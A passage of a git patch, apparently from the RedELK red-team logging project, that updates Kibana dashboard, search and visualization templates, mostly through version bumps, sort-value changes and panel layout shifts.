"{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"creds.realm.keyword\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":72,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - Credentials per realm tag cloud\"}"}, "coreMigrationVersion": "7.16.2", "id": "ff4497f0-d319-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "3fabe620-6c38-11ea-97d6-55783aed877a", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2306], "type": "visualization", "version": "1"} \ No newline at end of file From 8e4eae6f524cfaccb8d7e32a52ba17a2d1223036 Mon Sep 17 00:00:00 2001 From: Marc Smeets Date: Sun, 20 Feb 2022 15:00:23 +0100 Subject: [PATCH 18/18] Update of template files ao for issue #142 and #228 --- .../diff/redelk_kibana_dashboard.json | 122 ++++---- ...lk_kibana_index-pattern_.siem-signals.json | 6 +- ...redelk_kibana_index-pattern_bluecheck.json | 6 +- ...delk_kibana_index-pattern_credentials.json | 6 +- .../redelk_kibana_index-pattern_email.json | 6 +- ...edelk_kibana_index-pattern_implantsdb.json | 6 +- .../redelk_kibana_index-pattern_redelk.json | 6 +- ...elk_kibana_index-pattern_redirtraffic.json | 6 +- .../redelk_kibana_index-pattern_rtops.json | 6 +- .../templates/diff/redelk_kibana_search.json | 96 +++--- .../diff/redelk_kibana_visualization.json | 282 +++++++++--------- ...delk_elasticsearch_template_bluecheck.json | 40 +++ ...k_elasticsearch_template_redirtraffic.json | 28 ++ .../templates/redelk_kibana_dashboard.ndjson | 24 +- ..._kibana_index-pattern_.siem-signals.ndjson | 2 +- ...delk_kibana_index-pattern_bluecheck.ndjson | 2 +- ...lk_kibana_index-pattern_credentials.ndjson | 2 +- .../redelk_kibana_index-pattern_email.ndjson | 2 +- ...elk_kibana_index-pattern_implantsdb.ndjson | 2 +- ..._kibana_index-pattern_redelk-iplist.ndjson | 2 +- .../redelk_kibana_index-pattern_redelk.ndjson | 2 +- ...k_kibana_index-pattern_redirtraffic.ndjson | 2 +- .../redelk_kibana_index-pattern_rtops.ndjson | 2 +- .../templates/redelk_kibana_search.ndjson | 32 +- .../redelk_kibana_visualization.ndjson | 94 +++--- 25 files changed, 426 insertions(+), 358 deletions(-) diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_dashboard.json b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_dashboard.json index 60590cb9..6e02043a 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_dashboard.json +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_dashboard.json @@ -22,7 +22,7 @@ "enhancements": {} }, "gridData": { - "h": 2, + "h": 3, "i": "93f74516-7d73-4db3-8d64-589dfd7492b7", "w": 48, "x": 0, @@ -31,23 +31,23 @@ "panelIndex": "93f74516-7d73-4db3-8d64-589dfd7492b7", "panelRefName": "panel_93f74516-7d73-4db3-8d64-589dfd7492b7", "type": "visualization", - "version": "7.8.0" + "version": "7.16.3" }, { "embeddableConfig": { "enhancements": {} }, "gridData": { - "h": 2, + "h": 3, "i": "66e33663-63c3-4e78-aa5d-725e33754c02", "w": 48, "x": 0, - "y": 2 + "y": 3 }, "panelIndex": "66e33663-63c3-4e78-aa5d-725e33754c02", "panelRefName": "panel_66e33663-63c3-4e78-aa5d-725e33754c02", "type": "visualization", - "version": "7.8.0" + "version": "7.16.3" }, { "embeddableConfig": { @@ -58,12 +58,12 @@ "i": "800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3", "w": 8, "x": 0, - "y": 4 + "y": 6 }, "panelIndex": "800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3", "panelRefName": "panel_800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3", "type": "visualization", - "version": "7.8.0" + "version": "7.16.3" }, { "embeddableConfig": { @@ -74,12 +74,12 @@ "i": "86117a55-669e-4d4d-a4d6-436da4f1a930", "w": 8, "x": 8, - "y": 4 + "y": 6 }, "panelIndex": "86117a55-669e-4d4d-a4d6-436da4f1a930", "panelRefName": "panel_86117a55-669e-4d4d-a4d6-436da4f1a930", "type": "visualization", - "version": "7.8.0" + "version": "7.16.3" }, { "embeddableConfig": { @@ -90,12 +90,12 @@ "i": "ab07bed8-9d4e-409c-b3db-d15124eb5467", "w": 8, "x": 16, - "y": 4 + "y": 6 }, "panelIndex": "ab07bed8-9d4e-409c-b3db-d15124eb5467", "panelRefName": "panel_ab07bed8-9d4e-409c-b3db-d15124eb5467", "type": "visualization", - "version": "7.8.0" + "version": "7.16.3" }, { "embeddableConfig": { @@ -106,12 +106,12 @@ "i": "019655aa-c9de-444a-a4af-619b7297572b", "w": 8, "x": 24, - "y": 4 + "y": 6 }, "panelIndex": "019655aa-c9de-444a-a4af-619b7297572b", "panelRefName": "panel_019655aa-c9de-444a-a4af-619b7297572b", "type": "visualization", - "version": "7.8.0" + "version": "7.16.3" }, { "embeddableConfig": { @@ -122,12 +122,12 @@ "i": "43a0761e-49bc-4846-9956-04a604b063ec", "w": 16, "x": 32, - "y": 4 + "y": 6 }, "panelIndex": "43a0761e-49bc-4846-9956-04a604b063ec", "panelRefName": "panel_43a0761e-49bc-4846-9956-04a604b063ec", "type": "visualization", - "version": "7.8.0" + "version": "7.16.3" }, { "embeddableConfig": { @@ -138,12 +138,12 @@ "i": "eab2038d-128a-4b5b-8a72-701fd3f53bd8", "w": 8, "x": 0, - "y": 13 + "y": 15 }, "panelIndex": "eab2038d-128a-4b5b-8a72-701fd3f53bd8", "panelRefName": "panel_eab2038d-128a-4b5b-8a72-701fd3f53bd8", "type": "visualization", - "version": "7.8.0" + "version": "7.16.3" }, { "embeddableConfig": { @@ -154,12 +154,12 @@ "i": "e18544fe-ac30-43cf-891c-4448ffea6bbd", "w": 8, "x": 8, - "y": 13 + "y": 15 }, "panelIndex": "e18544fe-ac30-43cf-891c-4448ffea6bbd", "panelRefName": "panel_e18544fe-ac30-43cf-891c-4448ffea6bbd", "type": "visualization", - "version": "7.8.0" + "version": "7.16.3" }, { "embeddableConfig": { @@ -170,13 +170,13 @@ "i": "6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d", "w": 16, "x": 16, - "y": 13 + "y": 15 }, "panelIndex": "6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d", "panelRefName": "panel_6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d", "title": "Compromised realms", "type": "visualization", - "version": "7.8.0" + "version": "7.16.3" }, { "embeddableConfig": { @@ -187,12 +187,12 @@ "i": "223951c1-7fe0-40f9-9a89-0c91aedd7fce", "w": 8, "x": 32, - "y": 13 + "y": 15 }, "panelIndex": "223951c1-7fe0-40f9-9a89-0c91aedd7fce", "panelRefName": "panel_223951c1-7fe0-40f9-9a89-0c91aedd7fce", "type": "visualization", - "version": "7.8.0" + "version": "7.16.3" }, { "embeddableConfig": { @@ -203,12 +203,12 @@ "i": "c15dc2cd-fad3-44a3-b127-1cd47d837740", "w": 8, "x": 40, - "y": 13 + "y": 15 }, "panelIndex": "c15dc2cd-fad3-44a3-b127-1cd47d837740", "panelRefName": "panel_c15dc2cd-fad3-44a3-b127-1cd47d837740", "type": "visualization", - "version": "7.8.0" + "version": "7.16.3" } ], "refreshInterval": { @@ -221,7 +221,7 @@ "title": "RedELK - Summary dashboard", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "02486040-d355-11ea-9301-a30a04251ae9", "migrationVersion": { "dashboard": "7.16.0" @@ -289,8 +289,8 @@ } ], "sort": [ - 1642152857910, - 2054 + 1645365255915, + 13365 ], "type": "dashboard", "version": "1" @@ -401,7 +401,7 @@ "title": "RedELK - Red Team Operations", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "04b87c50-d028-11ea-9301-a30a04251ae9", "migrationVersion": { "dashboard": "7.16.0" @@ -434,8 +434,8 @@ } ], "sort": [ - 1642152857910, - 2060 + 1645363347725, + 1502 ], "type": "dashboard", "version": "1" @@ -547,7 +547,7 @@ "title": "RedELK - Tasks", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "0523c8a0-d025-11ea-9301-a30a04251ae9", "migrationVersion": { "dashboard": "7.16.0" @@ -580,8 +580,8 @@ } ], "sort": [ - 1642152857910, - 2066 + 1645363347725, + 1508 ], "type": "dashboard", "version": "1" @@ -787,7 +787,7 @@ "title": "RedELK - Traffic dashboard", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "0f8626d0-c6f4-11e8-a9c6-cd307b96b1ba", "migrationVersion": { "dashboard": "7.16.0" @@ -840,8 +840,8 @@ } ], "sort": [ - 1642152857910, - 2076 + 1645363347725, + 1518 ], "type": "dashboard", "version": "1" @@ -1031,7 +1031,7 @@ "title": "RedELK - Implants dashboard", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "117dbba0-c6f5-11e8-a9c6-cd307b96b1ba", "migrationVersion": { "dashboard": "7.16.0" @@ -1084,8 +1084,8 @@ } ], "sort": [ - 1642152857910, - 2086 + 1645363347725, + 1528 ], "type": "dashboard", "version": "1" @@ -1211,7 +1211,7 @@ "title": "RedELK - MITRE ATT&CK", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "3ed7a630-d051-11ea-9301-a30a04251ae9", "migrationVersion": { "dashboard": "7.16.0" @@ -1249,8 +1249,8 @@ } ], "sort": [ - 1642152857910, - 2093 + 1645363347725, + 1535 ], "type": "dashboard", "version": "1" @@ -1398,7 +1398,7 @@ "title": "RedELK - Health", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "509e6a80-926a-11eb-a753-9da683898c26", "migrationVersion": { "dashboard": "7.16.0" @@ -1441,8 +1441,8 @@ } ], "sort": [ - 1642152857910, - 2101 + 1645363347725, + 1543 ], "type": "dashboard", "version": "1" @@ -1586,7 +1586,7 @@ "title": "RedELK - Alarms dashboard", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "53b69200-d4e3-11ea-9301-a30a04251ae9", "migrationVersion": { "dashboard": "7.16.0" @@ -1629,8 +1629,8 @@ } ], "sort": [ - 1642152857910, - 2109 + 1645363347725, + 1551 ], "type": "dashboard", "version": "1" @@ -1746,7 +1746,7 @@ "title": "RedELK - Downloads dashboard", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "643de010-d04c-11ea-9301-a30a04251ae9", "migrationVersion": { "dashboard": "7.16.0" @@ -1779,8 +1779,8 @@ } ], "sort": [ - 1642152857910, - 2115 + 1645363347725, + 1557 ], "type": "dashboard", "version": "1" @@ -1891,7 +1891,7 @@ "title": "RedELK - Credentials dashboard", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "82b865a0-d318-11ea-9301-a30a04251ae9", "migrationVersion": { "dashboard": "7.16.0" @@ -1924,8 +1924,8 @@ } ], "sort": [ - 1642152857910, - 2121 + 1645363347725, + 1563 ], "type": "dashboard", "version": "1" @@ -2035,7 +2035,7 @@ "title": "RedELK - IOC dashboard", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "86643e90-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": { "dashboard": "7.16.0" @@ -2068,8 +2068,8 @@ } ], "sort": [ - 1642152857910, - 2127 + 1645363347725, + 1569 ], "type": "dashboard", "version": "1" @@ -2180,7 +2180,7 @@ "title": "RedELK - Screenshots dashboard", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "a2dcebf0-d316-11ea-9301-a30a04251ae9", "migrationVersion": { "dashboard": "7.16.0" @@ -2213,8 +2213,8 @@ } ], "sort": [ - 1642152857910, - 2133 + 1645363347725, + 1575 ], "type": "dashboard", "version": "1" diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_.siem-signals.json b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_.siem-signals.json index d176cab9..144318c2 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_.siem-signals.json +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_.siem-signals.json @@ -8669,15 +8669,15 @@ "timeFieldName": "@timestamp", "title": ".siem-signals-*" }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "195a3f00-d04f-11ea-9301-a30a04251ae9", "migrationVersion": { "index-pattern": "7.11.0" }, "references": [], "sort": [ - 1642152853649, - 1942 + 1645363343565, + 1305 ], "type": "index-pattern", "version": "1" diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_bluecheck.json b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_bluecheck.json index a1107ee2..178fe881 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_bluecheck.json +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_bluecheck.json @@ -603,15 +603,15 @@ "timeFieldName": "@timestamp", "title": "bluecheck-*" }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "bluecheck", "migrationVersion": { "index-pattern": "7.11.0" }, "references": [], "sort": [ - 1642152837408, - 1663 + 1645363325826, + 1146 ], "type": "index-pattern", "version": "1" diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_credentials.json b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_credentials.json index ff38d6f3..240c8b7c 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_credentials.json +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_credentials.json @@ -870,15 +870,15 @@ "timeFieldName": "@timestamp", "title": "credentials-*" }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "credentials", "migrationVersion": { "index-pattern": "7.11.0" }, "references": [], "sort": [ - 1642152839362, - 1858 + 1645363327726, + 1150 ], "type": "index-pattern", "version": "1" diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_email.json b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_email.json index 8e667549..465e7d10 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_email.json +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_email.json @@ -2826,15 +2826,15 @@ "timeFieldName": "@timestamp", "title": "email-*" }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "email", "migrationVersion": { "index-pattern": "7.11.0" }, "references": [], "sort": [ - 1642152841336, - 1866 + 1645363329707, + 1149 ], "type": "index-pattern", "version": "1" diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_implantsdb.json b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_implantsdb.json index ce84b5d6..118cea41 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_implantsdb.json +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_implantsdb.json @@ -1879,15 +1879,15 @@ ], "title": "implantsdb" }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "implantsdb", "migrationVersion": { "index-pattern": "7.11.0" }, "references": [], "sort": [ - 1642152843417, - 1817 + 1645363332328, + 1314 ], "type": "index-pattern", "version": "1" diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_redelk.json b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_redelk.json index fa3cbb31..84448ace 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_redelk.json +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_redelk.json @@ -206,15 +206,15 @@ ], "title": "redelk-*" }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "b5972620-2b72-11eb-85d7-bbc5b6917d13", "migrationVersion": { "index-pattern": "7.11.0" }, "references": [], "sort": [ - 1642152847512, - 1890 + 1645363337498, + 1307 ], "type": "index-pattern", "version": "1" diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_redirtraffic.json b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_redirtraffic.json index 57cd28d5..c9a9ba92 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_redirtraffic.json +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_redirtraffic.json @@ -9,15 +9,15 @@ "title": "redirtraffic-*", "typeMeta": "{}" }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "redirtraffic", "migrationVersion": { "index-pattern": "7.11.0" }, "references": [], "sort": [ - 1642154954544, - 16181 + 1645363339500, + 1313 ], "type": "index-pattern", "version": "1" diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_rtops.json b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_rtops.json index 2295571b..55cd41d5 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_rtops.json +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_index-pattern_rtops.json @@ -9,15 +9,15 @@ "title": "rtops-*", "typeMeta": "{}" }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "rtops", "migrationVersion": { "index-pattern": "7.11.0" }, "references": [], "sort": [ - 1642157817846, - 34863 + 1645363341515, + 1311 ], "type": "index-pattern", "version": "1" diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_search.json b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_search.json index 44f05722..dbd24daa 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_search.json +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_search.json @@ -33,7 +33,7 @@ "title": "RedELK - _Redirector Traffic", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", "migrationVersion": { "search": "7.9.3" @@ -46,8 +46,8 @@ } ], "sort": [ - 1642152855820, - 2152 + 1645363345688, + 1259 ], "type": "search", "version": "1" @@ -112,7 +112,7 @@ "title": "RedELK - C2 IOCs - Alarmed", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "10da2290-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": { "search": "7.9.3" @@ -130,8 +130,8 @@ } ], "sort": [ - 1642152855820, - 2155 + 1645363345688, + 1262 ], "type": "search", "version": "1" @@ -294,7 +294,7 @@ "title": "RedELK - _Red Team Operations", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "1c580960-b6a9-11e8-bc1a-cf8fa3255855", "migrationVersion": { "search": "7.9.3" @@ -337,8 +337,8 @@ } ], "sort": [ - 1642152855820, - 2163 + 1645363345688, + 1270 ], "type": "search", "version": "1" @@ -403,7 +403,7 @@ "title": "RedELK - C2 Downloads", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "migrationVersion": { "search": "7.9.3" @@ -421,8 +421,8 @@ } ], "sort": [ - 1642152855820, - 2166 + 1645363345688, + 1273 ], "type": "search", "version": "1" @@ -484,7 +484,7 @@ "title": "RedELK - C2 Keystrokes", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "3afbdbc0-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": { "search": "7.9.3" @@ -502,8 +502,8 @@ } ], "sort": [ - 1642152855820, - 2169 + 1645363345688, + 1276 ], "type": "search", "version": "1" @@ -540,7 +540,7 @@ "title": "RedELK - C2 Credentials", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "3fabe620-6c38-11ea-97d6-55783aed877a", "migrationVersion": { "search": "7.9.3" @@ -553,8 +553,8 @@ } ], "sort": [ - 1642152855820, - 2171 + 1645363345688, + 1278 ], "type": "search", "version": "1" @@ -619,7 +619,7 @@ "title": "RedELK - C2 IOCs", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": { "search": "7.9.3" @@ -637,8 +637,8 @@ } ], "sort": [ - 1642152855820, - 2174 + 1645363345688, + 1281 ], "type": "search", "version": "1" @@ -689,7 +689,7 @@ "title": "RedELK - Modules status", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "654f76a0-9269-11eb-a753-9da683898c26", "migrationVersion": { "search": "7.9.3" @@ -707,8 +707,8 @@ } ], "sort": [ - 1642152855820, - 2177 + 1645363345688, + 1284 ], "type": "search", "version": "1" @@ -747,7 +747,7 @@ "title": "RedELK - Redirector Traffic - Alarmed", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "658d7180-d4e1-11ea-9301-a30a04251ae9", "migrationVersion": { "search": "7.9.3" @@ -760,8 +760,8 @@ } ], "sort": [ - 1642152855820, - 2179 + 1645363345688, + 1286 ], "type": "search", "version": "1" @@ -806,7 +806,7 @@ "title": "RedELK - C2 implants overview", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": { "search": "7.9.3" @@ -819,8 +819,8 @@ } ], "sort": [ - 1642152855820, - 2181 + 1645363345688, + 1288 ], "type": "search", "version": "1" @@ -850,7 +850,7 @@ "title": "RedELK - IP Lists", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "87530b40-9269-11eb-a753-9da683898c26", "migrationVersion": { "search": "7.9.3" @@ -863,8 +863,8 @@ } ], "sort": [ - 1642152855820, - 2183 + 1645363345688, + 1290 ], "type": "search", "version": "1" @@ -898,7 +898,7 @@ "title": "RedELK - BlueCheck", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "a4757c90-ce50-11ea-a580-918d4757c08d", "migrationVersion": { "search": "7.9.3" @@ -911,8 +911,8 @@ } ], "sort": [ - 1642152855820, - 2185 + 1645363345688, + 1292 ], "type": "search", "version": "1" @@ -944,7 +944,7 @@ "title": "RedELK - Emails", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "c1fca0d0-d171-11ea-8ac3-bfcfabda2250", "migrationVersion": { "search": "7.9.3" @@ -957,8 +957,8 @@ } ], "sort": [ - 1642152855820, - 2187 + 1645363345688, + 1294 ], "type": "search", "version": "1" @@ -1011,7 +1011,7 @@ "title": "RedELK - C2 Tasks", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "cc523820-d021-11ea-9301-a30a04251ae9", "migrationVersion": { "search": "7.9.3" @@ -1029,8 +1029,8 @@ } ], "sort": [ - 1642152855820, - 2190 + 1645363345688, + 1297 ], "type": "search", "version": "1" @@ -1083,7 +1083,7 @@ "title": "RedELK - Signals", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "migrationVersion": { "search": "7.9.3" @@ -1101,8 +1101,8 @@ } ], "sort": [ - 1642152855820, - 2193 + 1645363345688, + 1300 ], "type": "search", "version": "1" @@ -1161,7 +1161,7 @@ "title": "RedELK - C2 Screenshots", "version": 1 }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": { "search": "7.9.3" @@ -1179,8 +1179,8 @@ } ], "sort": [ - 1642152855820, - 2196 + 1645363345688, + 1303 ], "type": "search", "version": "1" diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_visualization.json b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_visualization.json index 14d2756d..870ee5e0 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_visualization.json +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/diff/redelk_kibana_visualization.json @@ -149,7 +149,7 @@ "type": "histogram" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "057076f0-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -162,8 +162,8 @@ } ], "sort": [ - 1642152856829, - 2209 + 1645363346672, + 1159 ], "type": "visualization", "version": "1" @@ -303,7 +303,7 @@ "type": "histogram" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "0b5ffcd0-d317-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -316,8 +316,8 @@ } ], "sort": [ - 1642152856829, - 2211 + 1645363346672, + 1161 ], "type": "visualization", "version": "1" @@ -348,15 +348,15 @@ "type": "markdown" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "0f82b540-d237-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" }, "references": [], "sort": [ - 1642152856829, - 2212 + 1645363346672, + 1162 ], "type": "visualization", "version": "1" @@ -467,7 +467,7 @@ "type": "pie" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "10dcc4a0-b8e7-11e8-94dd-171ae5c1fd1a", "migrationVersion": { "visualization": "7.14.0" @@ -485,8 +485,8 @@ } ], "sort": [ - 1642152856829, - 2215 + 1645363346672, + 1165 ], "type": "visualization", "version": "1" @@ -577,7 +577,7 @@ "type": "tile_map" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "10dd40f0-b983-11e8-94dd-171ae5c1fd1a", "migrationVersion": { "visualization": "7.14.0" @@ -590,8 +590,8 @@ } ], "sort": [ - 1642152856829, - 2217 + 1645363346672, + 1167 ], "type": "visualization", "version": "1" @@ -682,7 +682,7 @@ "type": "tile_map" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "1d26da60-b983-11e8-94dd-171ae5c1fd1a", "migrationVersion": { "visualization": "7.14.0" @@ -695,8 +695,8 @@ } ], "sort": [ - 1642152856829, - 2219 + 1645363346672, + 1169 ], "type": "visualization", "version": "1" @@ -777,7 +777,7 @@ "type": "metric" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "20fac240-926c-11eb-a753-9da683898c26", "migrationVersion": { "visualization": "7.14.0" @@ -790,8 +790,8 @@ } ], "sort": [ - 1642152856829, - 2221 + 1645363346672, + 1171 ], "type": "visualization", "version": "1" @@ -945,7 +945,7 @@ "type": "histogram" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "231792d0-d050-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -958,8 +958,8 @@ } ], "sort": [ - 1642152856829, - 2223 + 1645363346672, + 1173 ], "type": "visualization", "version": "1" @@ -1113,7 +1113,7 @@ "type": "histogram" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "2f5a2760-d050-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -1126,8 +1126,8 @@ } ], "sort": [ - 1642152856829, - 2225 + 1645363346672, + 1175 ], "type": "visualization", "version": "1" @@ -1212,7 +1212,7 @@ "type": "pie" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "2f77a150-926a-11eb-a753-9da683898c26", "migrationVersion": { "visualization": "7.14.0" @@ -1225,8 +1225,8 @@ } ], "sort": [ - 1642152856829, - 2227 + 1645363346672, + 1177 ], "type": "visualization", "version": "1" @@ -1314,7 +1314,7 @@ "type": "pie" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": 